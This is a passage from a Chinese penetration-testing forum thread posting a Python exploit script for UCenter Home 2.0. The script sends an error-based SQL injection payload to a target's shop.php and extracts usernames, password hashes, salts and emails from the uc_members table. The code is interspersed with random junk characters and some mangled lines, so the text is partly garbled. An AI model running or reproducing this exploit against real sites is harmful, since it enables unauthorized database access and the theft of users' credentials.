找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
返回列表 发新帖
查看: 2557|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
! m: Z4 {; A5 a$ l, a $ U7 W9 i# }: s

5 G& E, A# E7 Z' x; o' k2 j+ U! g$ o#!/usr/bin/env python  " a+ _9 \5 `6 k
+ @  f- y8 l/ w! e
import sys  ; N; I! O5 n! j0 v3 |
import urllib2  
0 ^! l; g7 A# e0 pimport re  2 g& P2 S) h9 k" c6 y$ s: c5 q
: e  C" S3 S- o
def info():  
+ S$ g! }' g; H" v    print 'From:http://www.exploit-db.com/exploits/14997/'
3 D. x+ w* \: ]" i% U/ Q5 i2 p3 [6 |1 _    print 'http://www.hake.cc/Web_loudong/'
# B" Q4 A9 U& U- R1 \0 n    print 'changed:qiaoy'  
7 v9 K/ m, _1 W% ]3 M8 c6 A    print 'exp:'  
( _8 B0 r" a2 n/ z8 c7 y    print ' ./UCenter_Home_2.0.py site'  
& e' t# r" m" I1 M% p ) s# S( B  l. ]% d2 r
def main():  ) V7 b5 S# I/ t7 B6 o2 j, O1 O
    if len(sys.argv) != 2:  , V; d) |8 w3 Z( S+ R- C. D
        info()  1 j, q! G, z% a" ~8 p0 s
    else:  
8 N& \5 c9 A. b3 E  `. J# K& ]        site = sys.argv[1]  
! @3 `/ g1 T) M7 K        if site[0:7] == 'http://':  " z* Q  }) n1 T$ k$ {$ l
            sitesite =site  # T4 E) T4 u% W( v+ M0 l: z
        elif site[0:8] == 'https://':  
. x" g- D; k$ C  M5 c! G2 x( Z( R            sitesite = site  
/ E5 J& j1 Q& ~' J        else:    A. n5 t* }0 O$ u
            site = 'http://'+site  & _% b1 j# U& d; D- K! F
        try:  
: C/ \" h7 T8 X            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  5 a+ u4 {  U( E! V4 L9 S
            Value = urllib2.urlopen(url).read()  
, @5 u" n* T8 ^/ e8 j            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  8 g+ p# k( A, Y8 e  O! o2 _
            hacked = Msg.split(':')  : }: r% l' i5 F
            print 'Name:    '+hacked[1]  
( Q; T* N$ R: V6 d            print 'Passwd:  '+hacked[2]  
, j9 _5 M2 O; `; T* k: {) T- p            print 'salt:    '+hacked[3]  : d8 S% `% j2 F% P% k) n2 ^  j) W
            print 'email:   '+hacked[4]  
+ {1 E8 b8 M( `' r0 M8 ^  m. _, E        except:  
. m4 E: \, O  a+ p            print 'Sorry,I can\'t work............'  3 [% O" F/ n  s& L
' L# u/ {7 C0 ~* ]. l5 h/ E
if __name__ == '__main__':  
/ `5 B& ]# P0 o    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表